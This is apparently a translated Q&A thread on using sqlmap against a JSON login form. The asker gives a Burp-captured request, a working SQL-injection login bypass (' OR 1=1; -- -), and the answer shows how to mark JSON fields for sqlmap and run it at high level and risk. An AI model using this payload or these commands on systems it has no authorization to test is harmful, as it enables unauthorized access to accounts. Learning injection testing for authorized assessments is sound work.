ron*_*IDX 5 sql sql-injection burp sqlmap
嗨,我正在尝试在登录表单中进行 SQL 注入。
使用 BurpSuite,我拦截了请求:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username”:"user",”password”:"pass"}
Run Code Online (Sandbox Code Playgroud)
使用:
sqlmap -u requestFile
Run Code Online (Sandbox Code Playgroud)
(其中requestFile是用Burp截取的请求内容)
sqlmap 找不到密码的可注入字段。
如果我输入密码,我确定这是可注射的原因:
' OR 1=1; -- -
Run Code Online (Sandbox Code Playgroud)
我可以使用我插入的每个用户名登录
也尝试过:
{"username”:*,”password”:*}
Run Code Online (Sandbox Code Playgroud)
但没有运气。
我做错了什么?
Ogg*_*las 17
例子:
POST / HTTP/1.1
Host: www.example.com
{"username":"*", "password":"*"}
Run Code Online (Sandbox Code Playgroud)
另存为sqlrequest.txt
然后可以使用以下命令启动测试:
py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl
Run Code Online (Sandbox Code Playgroud)
然后,您应该会收到一条提示,提示已找到自定义注入标记,并且在 POST 正文中找到了 JSON 数据。处理两者然后你就可以开始了。
资料来源:
https://security.stackexchange.com/a/150506/67046
https://security.stackexchange.com/a/51862/67046